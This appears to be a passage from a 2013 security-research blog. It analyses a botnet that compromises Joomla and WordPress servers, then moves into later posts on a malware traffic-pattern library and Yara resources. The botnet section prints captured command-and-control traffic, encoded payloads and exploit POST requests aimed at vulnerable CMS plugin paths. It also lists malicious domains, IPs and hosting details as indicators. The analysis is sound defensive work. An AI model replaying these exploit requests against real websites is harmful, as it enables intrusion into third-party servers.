d=9kMAR6MOJUHhXRtO9B5McvZUG1PnQQsNrWQASedWQA2tcBNO53wCRf0TCWjYfz98wHw0dMRyIGXPfhtD4VwBT%2FVHLnf6XRZP5EAuY%2BZBAEX9RyRF4UAbT%2F1vIk%2F%2FWhFJ9kAuZetDHk%2FhVgB8wUYcXbVWAlL0Ak938kEcSf1UXx7BVhVJ4EcAWb4NJVL6RxcSvg0xQf1HPVD2XVJb23g%2Bbc9gPWbHZDNy1m8%2FSfBBHVP8VQZ8xFocRPxEAXzQRgBS9l0GdvZBAUn8XS5y5l0PBvZDAEehDiVB4V0bTvQeTHL2VBtT50ELDa1kAEnnVkANrXATTud8AkX9Ewlo2HAnfMB8NHTEciBlz34bQ%2BFcAU%2F1Ry53%2Bl0WT%2BRALmPmQQBF%2FUckReFAG0%2F9byJP%2F1oRSfZALmXrQx5P4VYAfMFGHF21VgJS9ABPd%2FJBHEn9VF8ewVYVSeBHAFm%2BDSVS%2BkcXEr4NMUH9Rz1Q9l1SW9t4J3PPHTZl1XInbMdvIU%2F1RwVB4VYubfpQAE%2FgXBRUz2QbTvdcBVPPcAdS4VYcVMVWAFP6XBx8w1weSfBaF1PPdgpQ%2F1wAReFvIFX9TlRF40EVFK5kE1L9WhxHvg0gRfRaAVThSl8exEEbVPYBXx7QUhxU3EMXTrNIOmvGYC4O13Y0YcZ%2FJnzAXBRU5FIARc9%2BG0PhXAFP9Ucud%2FpdFk%2FkQC5j5kEARf1HJEXhQBtP%2FW8gVf1O

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:10 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20

60
..F...@..>xH.G.....E.G.I._\S.\.E.R.P...R.....\.H..\J.TRC.].O.G\E.VR...@..A.N.@.A..]......GC..C.*

2. www.wholists.org directs the infected host to 'gettrial.store-apps.org' where it requests 'conh11.jpg' for download. We see that it's actually a WIN32 executable rather than a JPG file. The file has hash value of 7958f73daf4b84e3b00e008258ea2e7a and is well detected on VirusTotal
GET /d/conh11.jpg HTTP/1.1
User-Agent: -
Host: gettrial.store-apps.org
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:11 GMT
Content-Type: application/octet-stream
Content-Length: 98304
Last-Modified: Tue, 14 May 2013 20:21:33 GMT
Connection: keep-alive
Keep-Alive: timeout=20
ETag: "51929ccd-18000"
Accept-Ranges: bytes

3.  Next, our bot sends a GET request, "/img/seek.cgi?lin=100&db=ndb" to "seek4.run-stat.org" on 46.165.230.185, followed by a GET to bt.ads-runner.org on 208.115.109.53 for ae1.php 
GET /ae1.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: bt.ads-runner.org
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OKServer: nginx
Date: Mon, 27 May 2013 03:27:15 GMT
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 373
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 27 May 2013 03:27:15 GMT
Accept-Ranges: bytes
PldRR1A8aG1ma11xaWtsbGdwPi1XUUdQPAg+TENPRzwgSG1mayJRaWtsbGdwID4tTENPRzwIPlFX
QEg8SmciamcuIiJOY3ZrbCJhbWdmIm93ZGRma3RnZiIkImR3YWlnZiJmbWVle3F2e25nImBnZiJx
Z3o+LVFXQEg8Igg+UUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLXV1dSxlYHRjZXBrYW1uYyxh
bW8tYW1vcm1sZ2x2cS1hbW9dcm1ubi1jdUEzeixqdm9uIDxOY3ZrbCJhbWdmIm93ZGRma3RnZiIk
ImR3YWlnZiJmbWVle3F2e25nImBnZiJxZ3o+LWM8Pi1ma3Q8CD4tUUBNRls8CA==

There were several PHP scripts observed being downloaded from 46.165.230.185.  These are part of the arsenal of scripts, one or more of which may be injected to a vulnerable server.  We link here to the PHP scripts we saw in use this malware.  The presence of any of these scripts on a CMS webserver is a good indication of compromise.

4. The next conversation our bot initiated was of particular interest. Here the bot sent multiple requests for "ggu.php" from 'fw.point-up.org' on 85.143.166.221. The server would respond with a single URL representing a Wordpress or Joomla site.
GET /ggu.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: fw.point-up.org
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
41
http://redacted.com/English/data/cache/diggCache/f7/19/18/page.php
0


We scripted a fetch of this file every few seconds and have since collected thousands of URLs that will be targeted for exploits.  After receiving the target URL from the server on fw.point-up.org, the bot will attempt exploits with various payloads.  By dumping the VAD of the 'conhost.exe' process, I was able to find references to CMS module paths that have had reported vulnerabilities. For example:
List of URLs from fw.point-up.org
The server response varies depending on the success or failure of the attempt.  Examination of the traffic indicates a much larger proportion of apparently successful exploits than failures.  The following are examples of three different responses that were seen.
1. OKe807f1fcf82d132f9bb018ca6738a19f+0 -- OK followed by 1234567890 MD5 encoded
POST /fincaxxxxxxoja/administrator/components/com_akeeba/assets/javascript.php HTTP/1.1 Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 Host: [redacted].com
Content-Length: 439
Connection: Keep-Alive
Cache-Control: no-cache

lQSWlN=UGN0azk5cGN0a3FwZ2dsa3RjcWNsQntvY2tuLGFtbw==&eveKxt=JbvnFDiuGIh&moYkYn=b3ZjNSxjbzIse2NqbW1mbHEsbGd2&dsmIC=PldRR1A8a3BvY110Y25nbHh3Z25jPi1XUUdQPAg%2BTENPRzwgS3BvYyJUY25nbHh3Z25jID4tTENP RzwIPlFXQEg8RHU4IiJEcGdxaiJhd29kY2FnZiJqZ3BnPi1RV0BIPCIIPlFATUZbPAg%2BZmt0PD5j ImpwZ2Q%2FIGp2dnI4LS1wd3hlY3BkbyxsZ3YtdXIvYW1sdmdsdi12amdvZ3EtdnVnbHZ7dmdsLWNO M0gsanZvbiA8RHBncWoiYXdvZGNhZ2YiamdwZz4tYzw%2BLWZrdDwIPi1RQE1GWzwI &jwIm=YVdRaWRBe0NbVQ==

HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache X-Powered-By: PHP/5.2.14
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

OKe807f1fcf82d132f9bb018ca6738a19f+0

2. Not Allowed = Host not vulnerable
POST /plugins/editors/jce/libraries/classes/json/defines.php
HTTP/1.1 Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 Host: www.[redacted].org
Content-Length: 506 Connection: Keep-Alive
Cache-Control: no-cache

lFgaqq=UGN0azk5cGN0a3FqY0J7Y2ptbSxrdg==&eaMKYX=QMMIJINvf&mQaLuv=b3ovZ3csb2NrbixjbzIse2NqbW1mbHEsbGd2&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR

HTTP/1.1
406 Not Acceptable
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache
Content-Length: 226
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

Not Acceptable!

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.






POST /plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php
HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.[redacted].com
Content-Length: 506
Connection: Keep-Alive
Cache-Control: no-cache
lFgaqq=UGN7OTlwY3tgZ2xgbUJlb2NrbixhbW8=&eaMKYX=QMMIJINvf&mQaLuv=ZW9ja24vcW92ci9rbCxuLGVtbWVuZyxhbW8=&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR

HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:20 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-7+squeeze14 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 X-Powered-By: PHP/5.3.3-7+squeeze14 Vary: Accept-Encoding Content-Length: 354 Content-Type: text/html; charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive



Hosting Infrastructure 

The following is a list of the domains and IP addresses that were seen as part of this botnet infrastructure


Domain IP Address ASN Network Name
wholists.org 95.163.104.69 AS12695 Digital Networks CJSC
gettrial.store-apps.org 95.163.104.94 AS12695 Digital Networks CJSC
t22.run-stat.org 95.163.104.69 AS12695 Digital Networks CJSC
seek4.run-stat.org 46.165.230.185 AS16265 Leaseweb
bt.ads-runner.org 208.115.109.53 AS23033 Wowrack
fw.point-up.org 85.143.166.221 AS56534 PIRIX-CORPNET-2


Passive DNS

95.163.104.69 95.163.104.94 46.165.230.185 208.115.109.5385.143.166.221
www.wholists.org ns1.wholists.org ns1.upsave.info ntp.run-stat.orgfw.point-up.org
bns.wholists.org ns1.store-apps.org fw.stat-run.info bt.ads-runner.orgns2.memrem.ru
gjd.wholists.org ns1.games-olympic.org fw.run-stat.org sk4.ads-runner.orgns2.nalkanet.ru
lbh.wholists.org ns1.googleminiapi.com mail.stat-run.info ntp.stat-run.infons2.nallanite.ru
qdp.wholists.org peace.vijproject.com bt2.run-stat.org
vm.clodoserver.ru
www.techsign.org sogood.vitaminavip.com jc.upsave.info

ml.inviteyou.info img.stat-run.info ju.upsave.info


Passive DNS data courtesy of ISC SIE

Routing and Peers

The following are the BGP peering relationship graphs of the prefixes for the involved hosting providers.  

95.163.104.69 &  95.163.104.94- ASN12695 - Digital Networks CJSC (DINET)

Peering for AS12695 - January, 2013
Peering for AS12695 - May, 2013














In January, we see that for the prefix, 95.163.64.0/18, AS3216 and AS8657 were the primary upstreams for DINET, while in May, they added AS31133.

AS3216 - SOVAM-AS OJSC _Vimpelcom
AS8657 - CPRM PT Comunicacoes S A
AS31133 - MF-MGSM-AS OJSC MegaFon
CIDR Report for AS12695



208.115.109.53 - AS23033 - WowRack



Peering for AS23033 - January, 2013
Peering for AS23033 - May, 2013













For the prefix, 208.115.109.0/24, Wowrack's primary upstream is AS11404, AS-VOBIZ - vanoppen.biz LLC.
CIDR Report for AS23033



85.143.166.221 - AS56534 - PIRIX-CORPNET-2


Peering for AS56534 - January, 2013
Peering for AS56534 - May, 2013
















In January, for the prefix, 85.143.160.0/21, AS9002 and AS3267 were Pirix's primary upstreams. In May, they briefly added a relationship with AS50384.

AS9002 - ReTN.net 
AS3267 - RUNNET
AS50384 - W-IX_LTD
CIDR Report for AS56534


Monday, May 6, 2013

Library of Malware Traffic Patterns


Img: ''Harry Potter and the Sorcerer's Stone (movie)''Update May 6, 2013 We added ability to download corresponding samples and pcaps (when available). Same password scheme as contagio. Email Mila if needed.

Traffic analysis has been the primary method of malware identification and thousands of IDS signatures developed are the daily proof. Signatures definitely help but ability to visually recognize  malware traffic patterns has been always an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming and it is difficult to keep track of malware features if you don't have access to a well designed and constantly updated malware database. This started as "personal notes" spreadsheet with GET and POST requests for different malware families with information from open sources. We decided others might find it useful too.


This list is not meant to be the only way to identify malware families - it is an aid resource and reference. We will be adding data from our own research and online publications. (hint: please send us links to add)

The references column is a good source of links for malware analysis or resources for different families. The second tab "EZ Lookup" offers a more condensed view, which allows easier sorting. The Links tab gives resource list, and TBD tab shows entries for malware for which we don't have common/public names. The list features all types of malware: cybercrime, APT and hacktivism

VIEW OR DOWNLOAD "MALWARE TRAFFIC PATTERNS" SPREADSHEET 


To download (you might miss updates if you decide to use a static copy), click on File - Download As in the spreadsheet view. To sort any columns, click on View - List. Your sorting will not affect other visitors.  


If you think you can and wish to contribute, or have any comments or corrections please email Andre' or Mila

Monday, February 25, 2013

Yara Resources





Yara Project by Víctor Manuel Álvarez   

Yara Exchange Google Group - exchange yara signatures, tools, resources, and ideas. 170+ members as of Feb.2013





Notable Yara related publications by date: